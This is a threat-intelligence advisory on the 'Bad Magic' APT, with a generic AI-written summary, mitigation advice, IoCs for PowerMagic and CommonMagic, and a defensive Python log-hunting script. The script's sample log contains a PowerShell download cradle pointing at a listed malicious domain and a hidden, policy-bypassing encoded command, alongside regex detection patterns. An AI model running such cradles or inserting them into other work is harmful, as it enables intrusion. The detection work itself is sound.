OSINT - Bad magic: new APT found in the area of Russo-Ukrainian conflict
AI Analysis
Technical Summary
The reported threat concerns a newly identified Advanced Persistent Threat (APT) group operating in the context of the Russo-Ukrainian conflict. This APT, referred to as 'Bad magic,' has been detected through open-source intelligence (OSINT) efforts and is characterized by its use of PowerShell scripting (MITRE ATT&CK T1059.001) for payload delivery and network activity. The campaign appears to be focused on leveraging PowerShell to execute malicious code, which is a common technique for stealthy command and control and lateral movement within compromised networks. Although specific affected software versions or vulnerabilities are not detailed, the threat is linked to geopolitical tensions in Ukraine and surrounding regions, suggesting a targeted espionage or sabotage motive. The analysis confidence is moderate, with a threat level rated as low by the source, and no known exploits or patches are currently available. The lack of detailed technical indicators or exploits in the wild implies that the threat is either emerging or under active investigation. The campaign's use of PowerShell indicates a preference for living-off-the-land techniques, which complicates detection and mitigation efforts. Overall, this APT represents a persistent and evolving threat actor leveraging scripting and network-based tactics in a high-conflict geopolitical environment.
Potential Impact
For European organizations, especially those with ties to Ukraine or involved in sectors relevant to the Russo-Ukrainian conflict (such as government, defense, critical infrastructure, and diplomatic entities), this APT poses a risk of espionage, data exfiltration, and potential disruption of services. The use of PowerShell-based payload delivery can lead to unauthorized access, lateral movement within networks, and potential compromise of sensitive information. While the current severity is assessed as low, the geopolitical context and the persistent nature of APTs mean that the impact could escalate if the threat actor refines their capabilities or expands targeting. Organizations in Europe may face indirect risks through supply chain attacks or targeting of diaspora communities and allied institutions. The stealthy nature of PowerShell attacks also increases the risk of prolonged undetected intrusions, which can undermine confidentiality and integrity of critical data and systems.
Mitigation Recommendations
European organizations should implement advanced PowerShell logging and monitoring to detect anomalous script execution, including enabling Script Block Logging and Module Logging in Windows environments. Employ application control policies such as AppLocker or Windows Defender Application Control to restrict unauthorized PowerShell usage. Network segmentation and strict access controls can limit lateral movement opportunities. Regular threat hunting activities focusing on PowerShell command patterns and unusual network connections should be conducted. Organizations should also ensure that endpoint detection and response (EDR) solutions are tuned to identify living-off-the-land techniques. Given the geopolitical context, enhanced collaboration with national cybersecurity centers and sharing of threat intelligence related to this APT is recommended. Employee awareness training about spear-phishing and social engineering tactics commonly used to initiate such campaigns is also critical. Finally, maintaining up-to-date backups and incident response plans tailored to APT scenarios will improve resilience against potential compromises.
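As an added example (not code from this page or from the Securelist report it cites), the following Python hunts over constructed PowerShell Event ID 4104 script-block lines for the distribution-server indicators listed on this page together with a few generic living-off-the-land patterns; the log format, the regexes and the sample lines are assumptions.

```python
import re

# Network indicators copied from this page's IoC table (distribution servers).
PAGE_IOCS = {"webservice-srv.online", "webservice-srv1.online", "185.166.217.184"}

# Generic living-off-the-land heuristics for Script Block Logging text.
# These are assumed hunting patterns, not detections from the original advisory.
PATTERNS = {
    "download_cradle": re.compile(
        r"(Net\.WebClient|Invoke-WebRequest|DownloadString|DownloadFile)", re.I),
    "encoded_command": re.compile(
        r"-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "bypass_flags": re.compile(
        r"-(?:ExecutionPolicy|ep)\s+Bypass|-WindowStyle\s+Hidden|-w\s+hidden", re.I),
}

# Constructed sample log: "EventID | Host | ScriptBlockText". The encoded blob on
# WS-03 is the base64 of the harmless UTF-16LE string "Write-Host hi".
SAMPLE_LOG = """4104 | WS-01 | Get-ChildItem C:\\Users | Measure-Object
4104 | WS-02 | (New-Object Net.WebClient).DownloadString('http://webservice-srv.online/x')
4104 | WS-03 | powershell -w hidden -ep bypass -enc VwByAGkAdABlAC0ASABvAHMAdAAgAGgAaQA=
4104 | WS-04 | Test-NetConnection 185.166.217.184 -Port 443
"""


def ioc_hits(text):
    """Return the page IoCs that appear (case-insensitively) in a script block."""
    lowered = text.lower()
    return sorted(i for i in PAGE_IOCS if i in lowered)


def analyse_block(text):
    """Return finding names for one script block: pattern names, then ioc:<value>."""
    findings = [name for name, rx in PATTERNS.items() if rx.search(text)]
    findings += ["ioc:" + i for i in ioc_hits(text)]
    return findings


def hunt(log):
    """Parse the log and return {host: findings} for suspicious 4104 blocks only."""
    results = {}
    for line in log.strip().splitlines():
        # maxsplit=2 keeps pipes inside the script text itself (see WS-01) intact.
        event_id, host, text = (p.strip() for p in line.split(" | ", 2))
        if event_id != "4104":
            continue
        findings = analyse_block(text)
        if findings:
            results[host] = findings
    return results


if __name__ == "__main__":
    for host, findings in hunt(SAMPLE_LOG).items():
        print(host, findings)
```

Running it flags WS-02, WS-03 and WS-04 and leaves the benign WS-01 block alone; in practice the same logic would read the ScriptBlockText field of Microsoft-Windows-PowerShell/Operational events exported from your SIEM.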
Affected Countries
Ukraine, Poland, Germany, France, United Kingdom, Estonia, Lithuania, Latvia
Technical Details
- Threat Level: 3
- Analysis: 1
- Uuid: f3eda2d3-840b-46ba-ac74-50b68a58b0fe
- Original Timestamp: 1679481690
Indicators of Compromise
Domain
Value | Description
---|---
webservice-srv.online | Distribution servers
webservice-srv1.online | Distribution servers
Ip
Value | Description
---|---
185.166.217.184 | Distribution servers
Hash
Value | Description
---|---
0a95a985e6be0918fdb4bfabf0847b5a | Lure archives
ecb7af5771f4fe36a3065dc4d5516d84 | Lure archives
765f45198cb8039079a28289eab761c5 | Lure archives
ebaf3c6818bfc619ca2876abd6979f6d | Lure archives
1032986517836a8b1f87db954722a33f | Lure archives
1de44e8da621cdeb62825d367693c75e | Lure archives
7c0e5627fd25c40374bc22035d3fadd8 | —
9e19fe5c3cf3e81f347dd78cf3c2e0c2 | CommonMagic cryptography module
ce8d77af445e3a7c7e56a6ea53af8c0d | CommonMagic loader
1fe3a2502e330432f3cf37ca7acbffac | PowerMagic backdoor
8c2f5e7432f1e6ad22002991772d589b | PowerMagic loader
bec44b3194c78f6e858b1768c071c5db | PowerMagic dropper
fee3db5db8817e82b1af4cedafd2f346 | —
File
Value | Description
---|---
Overall.exe | —
Clean.exe | CommonMagic cryptography module
All.exe | CommonMagic loader
manutil.vbs | PowerMagic loader
service_pack.dat | PowerMagic dropper
attachment.msi | —
Link
Value | Description
---|---
https://securelist.com/bad-magic-apt/109087/ | —
Text
Excerpt from the Securelist report linked above:
Since the start of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context. We previously published an overview of cyber activities and the threat landscape related to the conflict between Russia and Ukraine and continue to monitor new threats in these regions.
In October 2022, we identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server.
Threat ID: 682acdbebbaf20d303f0e64a
Added to database: 5/19/2025, 6:20:46 AM
Last enriched: 7/9/2025, 12:24:58 AM
Last updated: 8/18/2025, 10:09:00 PM